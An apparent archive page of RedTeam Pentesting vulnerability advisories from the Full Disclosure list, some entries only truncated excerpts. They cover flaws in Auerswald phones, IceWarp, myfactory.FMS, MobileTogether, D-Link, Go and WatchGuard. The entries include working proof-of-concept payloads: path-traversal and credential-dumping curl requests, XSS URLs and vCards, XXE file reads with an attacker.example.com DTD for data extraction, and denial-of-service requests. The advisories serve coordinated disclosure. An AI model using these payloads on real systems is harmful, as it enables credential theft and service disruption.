RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks
[FD] [RT-SA-2021-004] Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass
..] } } The endpoint "/account" allows listing account data: $ curl --include --path-as-is \ 'http://192.168.1.190/about/../account?action=list' HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Cache-Control: no-cache Content-Length: 793 Date: Mon, 30 Aug 2021 08:43:33 GMT Server: lighttpd { "DATA": { [...] "accountList0": { "KEY": "accountList0", "COUNT": 1, "TYPE": "DATAMODEL", "VALUE": { "0": { "ID": 32327, "PARENTID": 0, "PROVIDER": "ProviderName", "NAME": "123 Example User", "STATUS": 4, "DEFAULT": 1 } }, [...] }, } } The ID 32327 can then be used to get details about that particular account, including the username and password: $ curl --include --path-as-is \ 'http://192.168.1.190/about/../account?action=get&itemID=32327' HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Cache-Control: no-cache Content-Length: 2026 Date: Mon, 30 Aug 2021 08:44:13 GMT Server: lighttpd { "DATA": { [...] "Benutzer": { "TYPE": "DATAITEM", "VALUE": "123", "KEY": "Benutzer" }, "Passwort": { "TYPE": "DATAITEM", "VALUE": "secret", "KEY": "Passwort" }, [...] } } Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to access and use the web-based management interface as if regular login credentials were presented. It is likely that other functionality can be accessed in the same way, to for example change settings or activate the integrated option for recording the Ethernet traffic. Workaround == Disable the web-based management interface if possible. Fix === Upgrade to a firmware version which corrects this vulnerability. Security Risk = Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. Attackers can then authenticate at the PBX as the respective phone and for example call premium rate phone lines they operate to generate revenue. They can also configure a device they control as the PBX in the phone, so all incoming and outgoing phone calls are intercepted and can be recorded. The device also contains a function to record all Ethernet data traffic, which is likely affected as well. Overall, the vulnerability completely bypasses the authentication for the web-based management interface and therefore poses a high risk. References == [1] https://curl.se [2] https://github.com/zaproxy/zaproxy/ Timeline 2021-08-26 Vulnerability identified 2021-09-01 Customer approved disclosure to vendor 2021-09-10 Vendor notified 2021-09-10 CVE ID requested 2021-09-10 CVE ID assigned 2021-10-04 Vendor provides access to device with fixed firmware 2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected 2021-10-14 Vendor releases corrected firmware version 2.8G 2021-12-06 Advisory published RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2021-001] Cross-Site Scripting in myfactory.FMS
Advisory: Cross-Site Scripting in myfactory.FMS During a penetration test, a reflected cross-site scripting vulnerability (XSS) was found in the myfactory.FMS login form. If a user opens an attacker-prepared link to the application, attackers can run arbitrary JavaScript code in the user's browser. Details === Product: myfactory.FMS Affected Versions: <= 7.1-911 Fixed Versions: 7.1-912 and later Vulnerability Type: Cross-Site Scripting Security Risk: medium Vendor URL: https://www.myfactory.com/myfactoryfms.aspx Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-001 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "With myfactory, you get a modern accounting application for your business. It covers every functionality necessary for an accounting system." (translated from German from the vendor's homepage) More Details The myfactory.FMS web application[0] allows users to login with a username and password. If the password is wrong, the application redirects to a URL similar to the following: http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=RedTeam The application then opens a dialogue telling the user that their username or password are wrong and uses the value of the parameter UID to prefill the login form resulting in the following source code: The UID parameter gets reflected without applying any encoding to it. A similar problem arises when the login leads to an error. This introduces a new parameter named 'Error': http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=RedTeam_Error The value of the Error parameter gets appended without encoding in the javascript function mOnLoad resulting in the following code: function mOnLoad( { var sParams; alert('Das System konnte Sie nicht anmelden.\n RedTeam_Error'); [...] Proof of Concept The XSS in the UID parameter can be triggered with the following URL: http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=";>alert("RedTeam+Pentesting") alert("RedTeam Pentesting") To demonstrate the XSS via the Error parameter, the following URL can be used: http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=');alert("RedTeam+Pentesting");// This will lead to the following JavaScript embedded in the HTML website returned by the server: function mOnLoad( { var sParams; alert('Das System konnte Sie nicht anmelden.\n ');alert("RedTeam+Pentesting");//'); [...] Workaround == None Fix === Install Version 7.1-912 or later. Security Risk = This security vulnerability allows to execute arbitrary JavaScript code in users' browsers if they access URLs prepared by attackers. This provides many different possibilities for further attacks against these users. The vulnerability could for example be exploited to display a fake login to obtain credentials and consequently access a company's accounting information. Since attackers might be able to get access to sensitive financial data, but users have to actively open an attacker-defined link, this vulnerability is estimated to pose a medium risk. Timeline 2021-05-07 Vulnerability identified 2021-05-27 Customer approved disclosure to vendor 2021-06-07 Vendor notified, support confirms vulnerability and implements fix. Support says vendor does not agree to a public advisory. 2021-06-10 Vendor contacts RedTeam Pentesting, reiterates that no advisory should be released. Vendor acknowledges public release after 90 days. 2021-10-04 Customer confirms update to fixed version 2021-10-13 Advisory released References == [0] https://www.myfactory.com/myfactoryfms.aspx RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The
[FD] [RT-SA-2021-002] XML External Entity Expansion in MobileTogether Server
--- ]> &redteam; The HTTP response contains the resolved XML entity: HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Server: CherryPy/18.1.0 [...] [...] RedTeam Pentesting [...] The following example shows how local files can be read from the server system hosting the MobileTogether Server on a Windows system: ]> &redteam; The content of the file is shown below and formatted for better readability: HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Server: CherryPy/18.1.0 [...] [...] ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [...] One interesting target for attackers could be the configuration file for the MobileTogether Server residing at the following fixed location: C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg For example, if the server supports HTTPS, the absolute path to the server's certificate and private key is stored in its configuration. Furthermore, external XML entities can be used to access third-party websites as well as web services that are only available internally. Together with an externally hosted XML DTD, response information can be extracted: http://internal.example.com";> "> http://attacker.example.com/dtd.xml";> % dtd; ]> &redteam; The DTD contains the following information: In the HTTP response, the HTML markup delivered by internal.example.com is now visible. A further vulnerability attacks the availability of the service through XML exponential entity expansion. This is demonstrated with the following XML document: ]> &redteam20; Sending the shown XML document leads to a huge server-side resource allocation which ultimately disrupts the availability of the MobileTogether Server. Workaround == None known. Fix === According to the vendor, upgrading to version 7.3 SP1 resolves the vulnerability. Security Risk = Attackers in possession of an account for a MobileTogether Server with access to at least one app are able to read files from the server system, conduct HTTP requests to external and internal systems and can also deny the availability of the service. Access might also be possible through default credentials or the anonymous user. Timeline 2021-06-21 Vulnerability identified 2021-06-23 Requested a security contact from vendor 2021-06-25 Security contact established with vendor 2021-07-05 Customer approved disclosure to vendor 2021-07-05 Vendor notified 2021-07-20 Vendor acknowledged vulnerability 2021-07-22 CVE ID requested 2021-07-23 CVE ID assigned 2021-07-28 Vendor released fixed version 2021-08-10 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2020-005] Arbitrary File Disclosure and Server-Side Request Forgery in BigBlueButton
le from the Internet. To exploit this vulnerability, attackers need to have access to a conference with the ability to upload presentations. While successful exploitation of this vulnerability would pose severe consequences for the affected BigBlueButton instance, it is only rated to pose a medium risk due to the requirement of having presentator access. Timeline 2020-09-11 Vulnerability identified 2020-09-18 Customer approved disclosure to vendor 2020-09-22 CVE ID requested 2020-09-22 CVE ID assigned 2020-09-24 Requested encrypted communication with vendor 2020-09-25 Vendor unable to provide encrypted communication, Vendor notified 2020-09-25 Vendor confirmed being able to reproduce vulnerability, mentioned similar bugreport 2020-09-25 Requested information whether "similar burgreport" uses the same vulnerability - no answer 2020-10-13 Again requested information whether "similar burgreport" uses the same vulnerability, whether release shedule is known - no answer 2020-10-14 Vendor released fixed version (without mentioning vulnerability) 2020-10-21 Vulnerability published by third party [7] 2020-10-21 Advisory released References == [1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton [2] http://opendocumentformat.org/ [3] https://www.w3.org/TR/xlink11/ [4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583 [5] https://docs.bigbluebutton.org/dev/api.html#usage [6] https://docs.bigbluebutton.org/support/faq.html#presentations [7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2020-003] FRITZ!Box DNS Rebinding Protection Bypass
020-07-08 Vendor notified 2020-07-20 Vendor provided fixed version to RedTeam Pentesting 2020-07-23 Vendor notified of another problematic IP 2020-08-06 Vendor provided fixed version to RedTeam Pentesting 2020-10-06 Vendor starts distribution of fixed version for selected devices 2020-10-19 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2020-002] Denial of Service in D-Link DSR-250N
Advisory: Denial of Service in D-Link DSR-250N RedTeam Pentesting discovered a Denial-of-Service vulnerability in the D-Link DSR-250N device which allows unauthenticated attackers in the same local network to execute a CGI script which reboots the device. Details === Product: D-Link DSR-250N Affected Versions: 3.12 and potentially later Fixed Versions: 3.17B Vulnerability Type: DoS Security Risk: low Vendor URL: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002 Advisory Status: published CVE: CVE-2020-26567 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567 Introduction "The D-Link Wireless N Unified Service Router (DSR-250N) provides enhanced security, functionality and performance over a traditional VPN router without the complexity of a full firewall solution. The D-Link Wireless N Unified Service Router is a cost-effective, high performance solution for securing a small business network." (from the vendor's homepage) More Details During a penetration test, the firmware for the D-Link DSR-250N router was downloaded from D-Links official website[1] and extracted for further analysis. It was then confirmed that CGI scripts exist on the router that can be directly accessed with a web browser, without any authentication. In particular, the script "upgradeStatusReboot.cgi" executes the command to reboot the device. Its contents are: #!/bin/sh echo Content-type: text/plain echo "" stat=`/sbin/reboot -d 8 &` echo $stat Executing this script renders the device unusable for the time of the reboot. In tests, it turned out that the device needs roughly four minutes to complete a reboot. As a consequence, any network using the device as a switch or router is not accessible during that time, too. In the penetration test, the router's web interface was available directly over the Internet. According to the vendor, the web interface is by default disabled for the WAN interface. Proof of Concept An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will reboot the device: $ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi Workaround == Access to the D-Link DSR-250N's web interface should only be enabled for administrators, for example by only allowing access from specific IP addresses in the firewall. Access over the WAN interface should also be disabled if it was enabled manually. Fix === A preview firmware version named 3.17B which should correct the issue was received at the end of September from the vendor. RedTeam Pentesting was not able to verify the fix due to lack of access to a test device. However, the formerly accessible CGI script is no longer part of the firmware. Security Risk = No authentication is needed to excute the CGI script and thereby reboot the device. Attackers might abuse this behaviour for targeted denial-of-service-attacks against D-Link customers, since rebooting the device interrupts access to networks relying on this device for routing or switching purposes. However, the attack is only possible if the attacker resides on the same network, and no further information can be gathered or control over the devices be obtained. Therefore, the vulnerability is rated as a low risk. Timeline 2020-06-29 Vulnerability identified 2020-07-03 Customer approved disclosure to vendor 2020-07-03 Requested security contact from vendor via web formular 2020-07-03 Vendor replied with contact information 2020-07-07 Advisory provided to vendor 2020-09-28 Vendor provided fixed version to RedTeam Pentesting 2020-10-05 CVE ID requested 2020-10-06 CVE ID assigned 2020-10-08 Advisory released References == [1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germa
[FD] [RT-SA-2020-004] Inconsistent Behavior of Go's CGI and FastCGI Transport May Lead to Cross-Site Scripting
$ curl -i -o - http://localhost:8001 HTTP/1.1 200 OK Content-Type: image/png [...] PNG[...] Workaround == Applications should explicitly set a Content-Type via the Header().Set() method of the ResponseWriter interface. The relevant code from the sample application mentioned above then looks like this: handler := http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) { w.Header().Set("Content-Type", "image/png") w.Write(image) }) Fix === The CGI and FastCGI implementations of the ResponseWriter interface should behave as documented and infer the Content-Type from the response data. This was implemented in Go versions 1.14.8 and 1.15.1 (the patch can be found here [7]). Security Risk = The risk of this vulnerability heavily depends on the concrete application at hand. If it depends on the documented behavior and is accessed via CGI or FastCGI and provides attackers a means to request data they can influence, this may lead to a cross-site scripting vulnerability. When other users of the same application request the attackers' data, the embedded JavaScript code is executed and the attackers can interact with the web application in the user's name, display arbitrary content within the user's browser, and observe the user's interaction with the web application. Considering the severe consequences and the requirements for exploitation (serving via CGI/FastCGI instead of HTTP), this vulnerability is rated as a medium risk. Timeline 2020-08-07 Vulnerability identified 2020-08-10 Vendor notified 2020-08-10 Vendor acknowledges receipt of report 2020-08-14 Vendor confirms security issues 2020-08-20 Vendor announces plans for a minor release of Go 2020-09-01 Vendor releases new version of Go, issue[6] is #40928, patch[7] References == [1] https://pkg.go.dev/net/http/?tab=doc#ResponseWriter [2] https://pkg.go.dev/net/http/httptest?tab=doc#ResponseRecorder [3] https://mimesniff.spec.whatwg.org/ [4] https://github.com/golang/go/blob/ba9e10889976025ee1d027db6b1cad383ec56de8/src/net/http/cgi/child.go#L196-L199 [5] https://github.com/golang/go/blob/ba9e10889976025ee1d027db6b1cad383ec56de8/src/net/http/fcgi/child.go#L112-L114 [6] https://github.com/golang/go/issues/40928 [7] https://go-review.googlesource.com/c/go/+/252179/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2020-001] Credential Disclosure in WatchGuard Fireware AD Helper Component
Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component RedTeam Pentesting discovered a credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext. Details === Product: WatchGuard Fireware AD Helper Component Affected Versions: 5.8.5.10233, < 5.8.5.10317 Fixed Versions: 5.8.5.10317 Vulnerability Type: Information Disclosure Security Risk: high Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "Threat Detection and Response (TDR) is a cloud-based subscription service that integrates with your Firebox to minimize the consequences of data breaches and penetrations through early detection and automated remediation of security threats." "Threat Detection and Response includes the AD Helper component. If your network has an Active Directory server, you can install AD Helper to manage automated installation and updates of Host Sensors on your network." (from the vendor's homepage) More Details By accessing the AD Helper's web interface, it was discovered that a call to an API endpoint is made, which responds with plaintext credentials to all configured domain controllers. There is no authentication needed to use the described interface and the installation instructions at [1] contain no indication of any way to configure access control. Proof of Concept An HTTP GET request to the path "/domains/list" of the AD Helper API returns, among others, the plaintext credentials to all configured Windows domain controllers: $ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"; | jq . { "content": [ { "id": 1, "fullyQualifiedName": "example.com", "logonDomain": "example.com", "domainControllers": "dc1.example.com", "username": "[DOMAIN_USER]", "password": "[DOMAIN_PASSWORD]", "uuid": "[...]", "servers": [ { [...] } ] } ], "totalPages": 1, "totalElements": 1, "number": 0, "numberOfElements": 1 } The same request and its response can be observed when initially accessing the web interface. The discovered version of AD Helper responds with the following server banner: jetty(winstone-5.8.5.10233-9.4.12.v20180830) It is likely that other versions of the AD Helper Component are vulnerable as well. Workaround == Ensure API of the AD Helper Component is not reachable over the network, for example by putting it behind a Firewall. Fix === Update to Version 5.8.5.10317 or later. Security Risk = No authentication is needed to access AD Helper's web interface and the installation instructions at [1] describe that configured domain user accounts must possess at least the following privileges: * Connect to the host * Mount the share ADMIN$ * Create a file on the host * Execute commands on the host * Install software on the host Access to the "ADMIN$" share implies a user with administrative privileges. Therefore, this vulnerability poses a high risk. Timeline 2020-02-12 Vulnerability identified 2020-02-19 Customer approved disclosure to vendor 2020-02-24 Tried to contact the German branch of WatchGuard 2020-02-27 Contacted the Dutch branch of WatchGuard 2020-02-28 Contact to ADHelper QA Team Lead established 2020-03-02 Advisory draft sent for verification 2020-03-10 Vendor released fixed version and blog post 2020-03-11 CVE ID requested 2020-03-11 Advisory released References == [1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in
[FD] [RT-SA-2019-016] IceWarp: Cross-Site Scripting in Notes
Advisory: IceWarp: Cross-Site Scripting in Notes During a penetration test, RedTeam Pentesting discovered that the IceWarp WebMail Server is prone to cross-site scripting attacks in notes for objects. If attackers with access to the IceWarp system provide a manipulated object that is displayed by users, they can run arbitrary JavaScript code in the users' browsers. Details === Product: IceWarp WebMail Server Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well Fixed Versions: IceWarp 12.2.1.1 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: http://www.icewarp.com/ Vendor Status: patch available Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-016 Advisory Status: published CVE: CVE-2019-19266 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19266 Introduction "Secure professional email with own domain and revolutionary integration with chat. Shared calendars for perfect planning." (from the vendor's homepage) More Details Users can create, modify and share appointments in IceWarp with other users of the web application. Especially noteworthy are the following two XML Entities in the request to create a new appointment: text/html <h1;>RedTeam Pentesting</h1;> These define a note for an appointment. It was found that in notes some HTML entities were rendered, but some entities and attributes were filtered. However, the filter only takes effect when the content type of the note is set to "text/html". When the content type is left out or set to any other type, the filter is not active, enabling attackers to circumvent the filter and execute JavaScript in the user's browser. The same is true for notes attached to other objects, such as files or tasks. Just using the calendar module, at least three ways to attack other IceWarp users are available using cross-site scripting in a note of an appointment: * Inviting other attendees to an appointment * Sharing access to an appointment * Sending a calendar file as a request via email Especially for the first variant of attacking an IceWarp user by adding that user to a manipulated appointment, no user interaction is required from the attacked user besides opening the IceWarp calendar. Proof of Concept Create an appointment using an HTTP request similar to the following: POST /[...]/webmail/server/webmail.php HTTP/1.1 Host: icewarp.example.com Content-Type: text/xml Example Appointment 0 U <img style="display: none;" src="x" onerror="alert('RedTeam Pentesting')"> 0 Z <_tzevnstartdate>2458801 <_tzevnenddate>2458801 <_tzevnstarttime>660 <_tzevnendtime>690 <_tzid>Europe/Amsterdam 60 Workaround == None known. Fix === Update to IceWarp 12.2.1.1. Security Risk = Attackers with access to an IceWarp account could give other legitimate IceWarp users access to manipulated objects. If the attacked user opens the preview of such an object, for example by just opening the calendar, a cross-site scripting vulnerability can be exploited. That could, for example, be used to display a fake login form and get access to the user's credentials, or to access any data stored in IceWarp such as emails, contacts, tasks, files or appointments. While this requires an attacker with access to an IceWarp account, this kind of access could be gained by exploiting the vulnerability described in rt-sa-2019-15 [1]. This is considered to pose a high risk. Timeline 2019-11-11 Vulnerability identified 2019-11-15 Vendor notified 2019-11-22 Customer approved disclosure 2019-11-25 CVE number requested 2019-11-25 CVE number assigned 2019-12-02 Vendor released fixed version 2019-12-10 Customer approved disclosure 2019-12-13 Fixed version released 2020-01-02 Advisory released References == [1] https://www.redteam-pentesting.de/advisories/rt-sa-2019-015 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in
[FD] [RT-SA-2019-015] IceWarp: Cross-Site Scripting in Notes for Contacts
Advisory: IceWarp: Cross-Site Scripting in Notes for Contacts During a penetration test, RedTeam Pentesting discovered that the IceWarp WebMail Server is prone to user-assisted cross-site scripting attacks in its contact module. If IceWarp users import a manipulated vcard, for example from an email, attackers can run arbitrary JavaScript code in the users' browsers. Details === Product: IceWarp WebMail Server Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well Fixed Versions: IceWarp 12.2.1.1 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: http://www.icewarp.com/ Vendor Status: patch available Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-15 Advisory Status: published CVE: CVE-2019-19265 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19265 Introduction "Secure professional email with own domain and revolutionary integration with chat. Shared calendars for perfect planning." (from the vendor's homepage) More Details IceWarp allows users to import contacts in vcard format [1] from emails. These contacts can contain HTML notes as can be seen by exporting notes created by IceWarp. The following line shows such a note: X-ALT-NOTE;FMTTYPE=text/html:RedTeam Pentesting By inserting JavaScript here, a cross-site scripting vulnerability can be exploited if an IceWarp user imports such a manipulated contact into IceWarp. The property handling for the HTML formatted note "X-ALT-NOTE" and "FMTTYPE" is not defined in the vcard [1] standard, but is borrowed from the calendar file format ical [2]. Originally, the vcard standard uses the property "NOTE". This field can be used to exploit a cross-site scripting in IceWarp, too. Proof of Concept Send an IceWarp user one of the following vcards: BEGIN:VCARD VERSION:4.0 FN:Pentesting\, RedTeam N:Pentesting;RedTeam;;; X-ALT-NOTE;FMTTYPE=text/html: EMAIL;TYPE=INTERNET,PREF:testus...@example.com END:VCARD or BEGIN:VCARD VERSION:4.0 FN:Pentesting\, RedTeam N:Pentesting;RedTeam;;; NOTE: EMAIL;TYPE=INTERNET,PREF:testus...@example.com END:VCARD Workaround == None known. Fix === Update to IceWarp 12.2.1.1. Security Risk = Attackers without an account on the IceWarp system can send specially crafted vcard [1] files to IceWarp users. If an IceWarp user imports that new contact into the IceWarp web application a cross-site scripting vulnerability can be exploited. That could, for example, be used to display a fake login form and get access to the user's credentials, or to access any data stored in IceWarp such as emails, contacts, tasks, files or appointments. Access to these could be abused to exploit the vulnerability described in rt-sa-2019-016 [3]. This is considered to pose a high risk. Timeline 2019-11-11 Vulnerability identified 2019-11-15 Vendor notified 2019-11-22 Customer approved disclosure 2019-11-25 CVE number requested 2019-11-25 CVE number assigned 2019-12-02 Vendor released fixed version 2019-12-10 Customer approved disclosure 2019-12-13 Fixed version released 2020-01-02 Advisory released References == [1] https://tools.ietf.org/html/rfc6350 [2] https://tools.ietf.org/html/rfc2445 [3] https://www.redteam-pentesting.de/advisories/rt-sa-2019-16 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, J
[FD] [RT-SA-2019-014] Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC
19-09-02 Vendor notified 2019-09-09 Vendor did not respond as promised 2019-09-17 Vendor could not be reached 2019-09-18 Vendor could not be reached 2019-10-28 Advisory published due to publication of CVE-2019-13549 References == [0] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-013.txt [1] http://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf [2] https://www.metasploit.com/ [3] https://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient [4] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 